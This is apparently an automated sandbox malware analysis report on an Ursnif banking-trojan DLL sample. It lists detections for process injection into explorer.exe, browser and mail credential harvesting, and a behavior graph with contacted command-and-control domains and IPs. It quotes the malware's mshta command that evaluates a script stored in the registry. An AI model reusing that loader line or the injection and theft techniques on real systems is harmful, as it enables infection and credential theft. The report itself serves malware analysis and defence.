Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000025.00000000.450806472.0000000005EA0000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000002.636715149.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F693D5 cpuid 0_2_02F693D5
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015110FC GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_015110FC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F693D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_02F693D5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0151179C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_0151179C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Behavior Graph:

Behavior Graph ID: 331120
Sample: 5fd9d7ec9e7aetar.dll
Startdate: 16/12/2020
Architecture: WINDOWS
Score: 100

Numbers in parentheses are the graph's node ids; the counters displayed beside each process node on the page are given in square brackets.

Start (2)
  DNS/IP: 8.8.8.8.in-addr.arpa; 1.0.0.127.in-addr.arpa; resolver1.opendns.com
  Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 10 other signatures
  Started: mshta.exe (9) [19]; loaddll32.exe (12) [1]; iexplore.exe (14) [1 55]; iexplore.exe (16) [1 73]

mshta.exe (9)
  Signatures: Suspicious powershell command line found
  Started: powershell.exe (18) [1 28]

loaddll32.exe (12)
  Signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; 3 other signatures
  Started: control.exe (22)

iexplore.exe (14)
  Started: iexplore.exe (24) [32]; iexplore.exe (27) [29]; iexplore.exe (29) [30]

iexplore.exe (16)
  Started: iexplore.exe (31) [28]

powershell.exe (18)
  Dropped: C:\Users\user\AppData\...\lcbc4odh.cmdline, UTF-8; C:\Users\user\AppData\Local\...\00wddsye.0.cs, UTF-8
  Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Compiles code for process injection (via .Net compiler)
  Injected: explorer.exe (33)
  Started: csc.exe (37); csc.exe (40); conhost.exe (42)

control.exe (22)
  Signatures: Changes memory attributes in foreign processes to executable or writable; Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)

iexplore.exe (24)
  DNS/IP: rosadalking.xyz 193.56.255.167, 49740, 49741, 49742 INFOCLOUD-SRLMD Romania

explorer.exe (33, injected)
  DNS/IP: 185.156.172.54, 443, 49762, 49764 M247GB Romania; 89.44.9.160, 80 M247GB Romania; pagead46.l.doubleclick.net 216.58.210.2, 443, 49761 GOOGLEUS United States
  Signatures: Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; Tries to harvest and steal browser information (history, passwords, etc); 4 other signatures

csc.exe (37)
  Dropped: C:\Users\user\AppData\Local\...\lcbc4odh.dll, PE32
  Started: cvtres.exe (44)

csc.exe (40)
  Dropped: C:\Users\user\AppData\Local\...\00wddsye.dll, PE32
  Started: cvtres.exe (46)

Contacted Public IPs

IP              Domain   Country        ASN     ASN Name         Malicious
193.56.255.167  unknown  Romania        213137  INFOCLOUD-SRLMD  true
89.44.9.160     unknown  Romania        9009    M247GB           false
216.58.210.2    unknown  United States  15169   GOOGLEUS         false
185.156.172.54  unknown  Romania        9009    M247GB           false

Contacted Domains

Name                        IP              Active
rosadalking.xyz             193.56.255.167  true
pagead46.l.doubleclick.net  216.58.210.2    true
resolver1.opendns.com       208.67.222.222  true
1.0.0.127.in-addr.arpa      unknown         unknown
8.8.8.8.in-addr.arpa        unknown         unknown